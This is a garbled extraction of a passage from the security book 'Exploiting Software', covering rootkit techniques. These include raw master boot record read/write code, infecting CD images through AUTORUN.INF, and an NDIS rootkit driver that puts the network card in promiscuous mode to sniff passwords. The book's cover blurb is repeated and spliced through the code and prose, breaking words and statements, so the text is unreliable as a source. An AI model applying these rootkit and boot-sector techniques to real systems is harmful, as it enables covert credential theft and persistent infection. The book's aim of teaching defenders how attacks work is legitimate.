} static inline u32 jedec_read_id(struct map_info *map, __u32 base, How struct d oes sof cfi_private t w are br eak ? How *cfi) do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. { Ex p lo i t in osf; g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d int t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st firmask; st lear n h ow r eal at t acks are really carr ied ou t . u32 result, This m ust = - h ave book m ay shock*cfi->device_type; y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he osf cfi->interleave scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t mask = (1 device_type * 8)) -1; Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem result = cfi_read(map, base + osf); When net w or k secur it y m ech anisms do n ot w or k result &= mask; At t ack pat t er ns return result; Rev er se engineer in g } Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e static inline void jedec_reset(u32 base, struct map_info *map, Tech niqu es f or cr aft ing m aliciou s inpu t struct cfi_private *cfi) The t echn ical det ails of b uf fer ov er f low s {

Root k it s

/* Ex p lo i t inReset g S o ft*/ w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. cfi_send_gen_cmd(0xF0, 0, base, map, cfi, cfi->device_type, NULL); /* Some misdesigned Intel chips do not respond for 0xF0 for a reset, * so ensure we're in read mode. * for this.

Send both the Intel and the AMD command

Intel uses 0xff for this, AMD uses 0xff for nop, so

* this should be safe. */ cfi_send_gen_cmd(0xFF, 0, base, map, cfi, cfi->device_type, NULL); /* Manufacturers */ •

Table of Content s



I ndex

#define MANUFACTURER_AMD

0x0001

Expl oit ing Softw a re How to Br e ak Code

#define MANUFACTURER_ATMEL

0x001f

By Gr eg Hoglund , Gar y McGr aw

#define MANUFACTURER_FUJITSU

0x0004

Pub lish er: Addison Wesley

#define MANUFACTURER_INTEL Pub Dat e: February 17, 200 4

0x0089

I SBN: 0- 20 1- 786 95 -8

#define MANUFACTURER_MACRONIX Pages: 51 2

#define MANUFACTURER_ST #define MANUFACTURER_SST

0x00C2 0x0020

0x00BF

How d oes MANUFACTURER_TOSHIBA sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are #define 0x0098 fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d /* pAMD */ t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n0x2258 h ow r eal at t acks are really carr ied ou t . #define AM29F800BB This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he #define AM29F800BT 0x22D6 scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t #define AM29LV800BB

0x225B

Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k /* Fujitsu */ At t ack pat t er ns #define MBM29LV650UE 0x22D7 Rev er se engineer in g #define MBM29LV320TE 0x22F6 Classic at t acks ag ainst serv er soft w ar e } Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s To w r ap up our discu ssion of har dw ar e, EEPROM chip s r em ain a pr im e ar ea for st oring sub ver siv As m or e emb Root k it sed ded d ev ices becom e av ailab le, t he EEPROM- based v iru s w ill be m or e app licable a dan gerou s. Legit im at e code ex ist s t hat w ill q uery for EEPROM dev ices an d p er f orm operat ion s. Pr ho ishist of illed exp er im it h EEPROM e w ill som e t est m achines t hat hav e Exact p loitiion t in er g sS w o ft ww a re wit h en t htewt ools, con ceptcod s, and knneed ow ledg e necessar y t o b reak emb ed ded EEPROM. Dev ice dr iv er code f ound in Linu x and Wind ows pr ovid es p len t y of fod der fo soft w ar e. exp er im en t s.

Low-Level Disk Access Anot h er t r adit ional m et hod of st or in g vir uses has b een on boot b lock s, flop py disk s, and har d dr iv es. I nt er est in gly enoug h, t h ese t echniqu es st ill wor k t od ay and it ' s quit e sim ple t o access t he boot block of a dr iv e. The f ollow ing code illust r at es a sim ple m et h od t o r ead an d wr it e •fr om t he m ast Table of Content er boot recors d on an NT sy st em . •

I ndex

Expl oit ing Softw a re How to Br e ak Code

Reading/Writing the Master Boot Record (MBR) By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley To ob t ain access t o t h e MBR you m ust hav e r aw r ead / w rit e access t o t h e phy sical dr ive it self. Pub aDat e: February 4 Using sim ple call 17, t o 200 CreateFile an d t he p rop er object n ame, y ou can op en an y of t he SBN: 786 95 -8 f ollow ing code show s how t o open a han dle t o t he f irst phy sical dr ive dr iv es Ion a 0sy20 st1-em. The and subsequ Pages: 51en 2 t ly read t he f ir st 51 2 b yt es of d at a f rom it . This b lock of d at a cont ain s t he cont ent s of t he f ir st d r iv e sect or , ot herw ise k now n as t he MBR.

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om char at t ack mbr_data[512]; , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . DWORD dwBytesRead; This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e= ex ploit w ill con t inue t o be a ser ious p r oblem HANDLE hDriver CreateFile("\\\\.\\physicaldrive0", When net w or k|secur it y m ech anisms do n ot w or k GENERIC_READ GENERIC_WRITE, At t ack pat t er ns | FILE_SHARE_WRITE, FILE_SHARE_READ 0,Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e OPEN_EXISTING, Sur pr ising at t acks ag ainst clien t soft war e 0, Tech niqu es f or cr aft ing m aliciou s inpu t 0); The t echn ical det ails of b uf fer ov er f low s Root k it s ReadFile( hDriver, &mbr_data, 512, &dwBytesRead, NULL ); Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

Infecting CD-ROM Images CD - ROMs use t he I SO9 660 f ile sy st em . Th ese can be inf ect ed w it h vir us p rog ram s in a sim ilar w ay t hat f lop py d isk s can b e inf ect ed wit h a vir us. A boot ab le CD can m ost cert ain ly con t ain a v iru s t hat is act ivat ed on boot . An ot her t r ick is using t he AUTORUN. I NF f ile. The

AUTORUN.I NF f ile causes pr ogr am s t o b e launched aut om at ically w hen t h e CD is insert ed. This f eat ur e is oft en on by d ef ault . Last ly , f iles on t h e CD can sim ply be in fect ed using st andar d t r ick s. Ther e is not hing st opping a vir us or r oot kit fr om accessing a CD- R dr ive an d bu rn ing infor m at ion t o a m ount ed ( w rit ab le) CD disk. [ 7] [ 7]

Mor e on t he idea of infect ing CD images can be found in t he 'zine 2 9 A Labs , issue 6, " I nfecting I SO CD I mages" by ZOMBiE. •

Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

Adding Network Support to a Driver Allow in g a r oot k it dr iv er t o t alk t o t he n et wor k ad ds a final, b ut cr it ical t ouch, allow ing t h e code be accessed rem ot ely . I t is possib le t o em bed a TCP/ I P st ack in t o a dr iver and op en a rem ot e shell. I n f act , t he p opular k er nel- mod e debug ger called Soft I ce has t his f eat u re. Th e NTROOT •r oot k it dist r ibut Table s w .r oot k it . com h as sam ple code t hat exp oses a TCP/ I P shell. Under edoffrContent om w w •Wind ows NT,I ndex an easy w ay t o bu ild net w or k supp ort is t o use t he ND I S lib r ary . Unf ort unat ely not Expl oit ing a re How to Br ecov ak Code m any d evSoftw ice dr iver b ooks er t he sub ject of net w or k dev ice d r iv ers. Th us, use of NDI S has no been ell d ocu ment ed aw out side t he DD K. By Gr egwHoglund , Gar y McGr Pub lish er: Addison Wesley

Using NDIS Pub Datthe e: February 17, Library 200 4 I SBN: 0- 20 1- 786 95 -8

Micr osof t sup t he NDI S lib rar y f or net w or k and pr ot ocol d riv er s t o im plement t heir ow n st ac Pages: 51plies 2 independ en t of t h e net w or k card . We can use t his libr ar y t o build a st ack and com mu nicat e w it h t he net w ork . Th is is one w ay t h at a r oot kit dr iver can pr ov id e an int eract iv e shell. The f ir st st ep in using NDI S is t o r eg ist er a set of callback f unct ions for NDI S operat ion s. The OnXXX v alues ar e poin t er s t o callb ack fun ct ion s. [ 8] How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, intplete ru sion ectthese ion syexamples st em s, and ant iv ir us soft g out. t he bad g uy s? [ 8] Com sourdet ce for can be obtained fr om war http:e/ n / wot w wk.reep oot in kit.com What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t NTSTATUS DriverEntry( IN PDRIVER_OBJECT theDriverObject, IN PUNICODE_STRING Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem theRegistryPath When net w or k)secur it y m ech anisms do n ot w or k {

At t ack pat t er ns NDIS_PROTOCOL_CHARACTERISTICS Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e UNICODE_STRING aDriverName;

aProtocolChar; // DD

Sur pr ising at t acks ag ainst clien t soft war e Tech niqu /* es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s * init network sniffer - this is all standard and Root k it s * documented in the DDK. Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. */ RtlZeroMemory( &aProtocolChar, sizeof(NDIS_PROTOCOL_CHARACTERISTICS)); aProtocolChar.MajorNdisVersion

= 3;

aProtocolChar.MinorNdisVersion

= 0;

aProtocolChar.Reserved

= 0;

aProtocolChar.OpenAdapterCompleteHandler

= OnOpenAdapterDone;

aProtocolChar.CloseAdapterCompleteHandler = OnCloseAdapterDone; aProtocolChar.SendCompleteHandler • •

= OnSendDone;

Table of Content s

aProtocolChar.TransferDataCompleteHandler = OnTransferDataDone; I ndex

Expl oit ing Softw a re How to Br e ak Code

aProtocolChar.ResetCompleteHandler

= OnResetDone;

By Gr eg Hoglund , Gar y McGr aw

aProtocolChar.RequestCompleteHandler

= OnRequestDone;

Pub lish er: Addison Wesley

aProtocolChar.ReceiveHandler Pub Dat e: February 17, 200 4

= OnReceiveStub;

I SBN: 0- 20 1- 786 95 -8

aProtocolChar.ReceiveCompleteHandler

= OnReceiveDoneStub;

aProtocolChar.StatusHandler

= OnStatus;

aProtocolChar.StatusCompleteHandler

= OnStatusDone;

Pages: 51 2

How d oesaProtocolChar.Name sof t w are br eak ? How do at t acker s m ake sof t w ar e = br eak on p ur pose? Why are aProtoName; fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d DbgPrint("ROOTKIT: Registering NDIS Protocol\n"); t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he NdisRegisterProtocol( &aStatus, scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t &aNdisProtocolHandle, Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem &aProtocolChar, When net w or k secur it y m ech anisms do n ot w or k sizeof(NDIS_PROTOCOL_CHARACTERISTICS)); At t ack pat t er ns Rev er se engineer in g if (aStatus != NDIS_STATUS_SUCCESS) { Classic at t acks ag ainst serv er soft w ar e DbgPrint(("DriverEntry: ERROR NdisRegisterProtocol failed\n")); Sur pr ising at t acks ag ainst clien t soft war e return aStatus; Tech niqu es f or cr aft ing m aliciou s inpu t The t}echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in aDriverName.Length g S o ft w a re is f illed wit = h t0; h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. aDriverName.Buffer = ExAllocatePool( PagedPool, MAX_PATH_LENGTH );

aDriverName.MaximumLength = MAX_PATH_LENGTH; RtlZeroMemory(aDriverName.Buffer, MAX_PATH_LENGTH);

/* _______________________________________________________________ * get the name of the MAC-layer driver * and the name of the packet driver • •

* Table HKLM/SYSTEM/CurrentControlSet/Services/TcpIp/Linkage .. of Content s I ndex

* _______________________________________________________________ Expl oit ing Softw a re How to Br e ak Code

*/

By Gr eg Hoglund , Gar y McGr aw

if (ReadRegistry( &aDriverName ) != STATUS_SUCCESS) {

Pub lish er: Addison Wesley

goto RegistryError;

Pub Dat e: February 17, 200 4 I SBN: } 0- 20 1- 786 95 -8 Pages: 51 2

... NdisOpenAdapter( &aStatus, How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? &aErrorStatus, What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. &anOpenP->AdapterHandle, Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n &aDeviceExtension->Medium, h ow r eal at t acks are really carr ied ou t . &aMediumArray, This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t 1, Why sof t w ar e ex ploit waDeviceExtension->NdisProtocolHandle, ill con t inue t o be a ser ious p r oblem When net w or k secur it yanOpenP, m ech anisms do n ot w or k At t ack pat t er ns

&aDeviceExtension->AdapterName,

Rev er se engineer in g

0,

Classic at t acks ag ainst serv er soft w ar e NULL); Sur pr ising at t acks ag ainst clien t soft war e if (aStatus != NDIS_STATUS_PENDING) Tech niqu es f or cr aft ing m aliciou s inpu t { The t echn ical det ails of b uf fer ov er f low s OnOpenAdapterDone( Root k it s anOpenP, Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. aStatus, NDIS_STATUS_SUCCESS ); }

...

}



Table of Content s



I ndex

Expl Softwisa re to Br e ak Code The oit f iring st call t o How NdisRegisterProtocol, w hich is how we regist er our callback f unct ions. Th e second call is , tGar o ReadRegistry ( ex plained lat er ) , w h ich t ells us t h e bind in g nam e for t he n et w or By Gr eg Hoglund y McGr aw card . This in for m at ion is u sed t o in it ialize t he dev ice ex t ension st r uct ur e t h at is t h en u sed in a ca t o NdisOpenAdapter. I f t he call r et ur ns su ccess, we mu st m anually call OnOpenAdapterDone. I f Pub lish er: Addison Wesley t he call r et ur ns NDIS_STATUS_PENDING t his m ean s t hat t he OS is g oin g t o m ak e a callback t o Pub Dat e: February 17, 200 4 OnOpenAdapterDone on ou r behalf. I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

Putting the Interface in Promiscuous Mode When a n et wor k int er f ace is in " pr om iscu ous m ode" it can sn if f all pack et s t hat are phy sically deliver ed t o t he in t er f ace, r egar dless of t arg et add ress. This is r equir ed if y ou w ant t o see t r aff ic How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are t hat is dest ined for ot h er machin es on t h e net w or k. We pu t t h e net w or k int erf ace car d int o fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? pr om iscuou s m ode so t he r oot k it can sn if f passw ord s and ot her com m unicat ions chan nel What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. inf orm at ion. This is per for m ed in t h e OnOpenAdapterDone call. We u se t he NdisRequest f un ct ion tEx o p set face o pr om iscu ous mamp ode:les of r eal at t ack s, at t ack pat t er ns, t ools, an d lo itthe in gintSer o ft w a int re is loaded w it h ex t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem VOID When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns IN NDIS_HANDLE ProtocolBindingContext, OnOpenAdapterDone( Rev er se engineer in g

IN NDIS_STATUS Status,

Classic at t acks ag ainst serv er soft w ar e IN NDIS_STATUS OpenErrorStatus ) {

Sur pr ising at t acks ag ainst clien t soft war e

Tech niqu es f or cr aft ing m aliciou s inpu t PIRP Irp = NULL; The t echn ical det ails of b uf fer ov er f low s POPEN_INSTANCE Open = NULL; Root k it s NDIS_REQUEST anNdisRequest; Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft wBOOLEAN ar e. anotherStatus; ULONG

aMode = NDIS_PACKET_TYPE_PROMISCUOUS;

DbgPrint("ROOTKIT: OnOpenAdapterDone called\n");

/* set card into promiscuous mode */ if(gOpenInstance){ // // • •

Initializing the event Table of Content s

// I ndex

Expl oit ing Softw a re How to Br e ak Code

NdisInitializeEvent(&gOpenInstance->Event); By Gr eg Hoglund , Gar y McGr aw anNdisRequest.RequestType = NdisRequestSetInformation;

Pub lish er: Addison Wesley

Pub Dat e: February 17, 200 4

anNdisRequest.DATA.SET_INFORMATION.Oid = OID_GEN_CURRENT_PACKET_FILTER;

I SBN: 0- 20 1- 786 95 -8 Pages: 51 2 anNdisRequest.DATA.SET_INFORMATION.InformationBuffer

= &aMode;

anNdisRequest.DATA.SET_INFORMATION.InformationBufferLength = sizeof(ULONG); How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. NdisRequest( &anotherStatus, Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s tgOpenInstance->AdapterHandle, o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . &anNdisRequest This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in );m any hack ing book s, you w ill learn abou t } Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem return; When net w or k secur it y m ech anisms do n ot w or k }

At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e

Finding the Correct Network Card Sur pr ising at t acks ag ainst clien t soft war e Wind ows Techst niqu ores esinf f ororcr mat aftion ing abou m aliciou t n etswinpu or k tcar ds in t he follow in g regist r y k ey : The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards

Under t h is key ar e a ser ies of n um ber ed subk eys. Each sub key r epr esent s a net w or k card or

int er face. The sub key cont ain s a v ery im por t an t v alue called ServiceName. Th is value is a st r ing t hat cont ains t he GUI D, w hich m u st be u sed t o open t h e adap t er . Th e r oot kit dr iver m u st obt ain one of t hese GUI D st rin gs t o open a bind ing t o t h e adap t er usin g ND I S. The f ollow in g cod e sn ippet ob t ains t h is GUI D v alue f or t he f irst net w or k int erf ace list ed [ 9] : [ 9]

On ce again, all this code can be obtained fr om http: / / w w w .r oot kit.com as par t of the NTROOT r ootk it dr ive



Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 1- 786 95 -8 /* this is0- 20 major work just to enum a subkey value */ Pages: 51 2

NTSTATUS EnumSubkeys( PWSTR How IN d oes sof t w aretheRegistryPath, br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? INt oolsPUNICODE_STRING theStringP What can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. ) Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om { at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he //---------------------------------------------------scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t // for opening parent key Why sof hKey; t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem HANDLE When net w or k secur itoa; y m ech anisms do n ot w or k OBJECT_ATTRIBUTES At t ack pat t er ns NTSTATUS Status; Rev er se engineer in g UNICODE_STRING ParentPath; Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e // for enumerating a subkey Tech niqu es f or cr aft ing m aliciou s inpu t KEY_BASIC_INFORMATION Info; The t echn ical det ails of b uf fer ov er f low s PKEY_BASIC_INFORMATION pInfo; Root k it s ULONG ResultLength; Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft wULONG ar e. Size; PWSTR Position; PWSTR FullName;

// for value query

RTL_QUERY_REGISTRY_TABLE aParamTable[2]; //---------------------------------------------------DbgPrint("rootkit: entered EnumSubkeys()\n"); __try •

Table of Content s

•{

I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg RtlInitUnicodeString(&ParentPath, Hoglund , Gar y McGr aw

theRegistryPath);

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4

/*

I SBN: 0- 20 1- 786 95 -8

Pages: 51 2

**

First try opening this key

*/ InitializeObjectAttributes(&oa, How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s,&ParentPath, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. OBJ_CASE_INSENSITIVE, Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eakNULL, sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . (PSECURITY_DESCRIPTOR)NULL); This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr iptStatus k id die t=r eat m en t f ound in m any hack ing book s, you w ill learn abou t ZwOpenKey(&hKey, KEY_READ, Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y&oa); m ech anisms do n ot w or k At t ack pat t er ns if { Rev(!NT_SUCCESS(Status)) er se engineer in g Classic return at t acks Status; ag ainst serv er soft w ar e }Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s /* Root k it s ** First find the length of the subkey data. Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w*/ ar e. Status = ZwEnumerateKey(hKey, 0, /* index of zero */ KeyBasicInformation, &Info,

sizeof(Info), &ResultLength);

if (Status == STATUS_NO_MORE_ENTRIES || NT_ERROR(Status)) { •

Table of Content s

return Status;



I ndex

Expl oit ing Softw a re How to Br e ak Code

}

By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley

Size Info.NameLength Pub Dat e: =February 17, 200 4

+ FIELD_OFFSET(KEY_BASIC_INFORMATION, Name[0]);

I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

pInfo = (PKEY_BASIC_INFORMATION) ExAllocatePool(PagedPool, Size); How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? Whatif t ools can be==u sed t o b{ reak soft war e? Th is book p rov ides t he answ er s. (pInfo NULL) Ex p lo i t in Status g S o ft w = a reSTATUS_INSUFFICIENT_RESOURCES; is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . return Status; This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he } scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem /* When net w or k secur it y m ech anisms do n ot w or k ** Now enumerate the first subkey. At t ack pat t er ns */ Rev er se engineer in g Status = ZwEnumerateKey(hKey, Classic at t acks ag ainst serv er soft w ar e 0, Sur pr ising at t acks ag ainst clien t soft war e KeyBasicInformation, Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf ferpInfo, ov er f low s Root k it s

Size,

Ex p lo i t in g S o ft w a re is f illed wit h &ResultLength); t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. if (!NT_SUCCESS(Status)) { ExFreePool((PVOID)pInfo); return Status; }

if (Size != ResultLength) { ExFreePool((PVOID)pInfo); Status = STATUS_INTERNAL_ERROR; return Table ofStatus; Content s

• •

I ndex

}ing Softw a re How to Br e ak Code Expl oit By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley /* Pub Dat e: February 17, 200 4

**I SBN: Generate 0- 20 1- 786 95 the -8 fully expanded name and query values. Pages: 51 2

*/ FullName = ExAllocatePool(PagedPool, ParentPath.Length + How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? sizeof(WCHAR) + // '\' What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. + s, sizeof(UNICODE_NULL)); Ex p lo i t in g S o ft w a re is loaded w it h pInfo->NameLength ex amp les of r eal at t ack at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om if NULL) at t ack , y(FullName ou m u st fir st==lear n h ow{r eal at t acks are really carr ied ou t . This m ust ExFreePool((PVOID)pInfo); - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t return STATUS_INSUFFICIENT_RESOURCES; }Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k 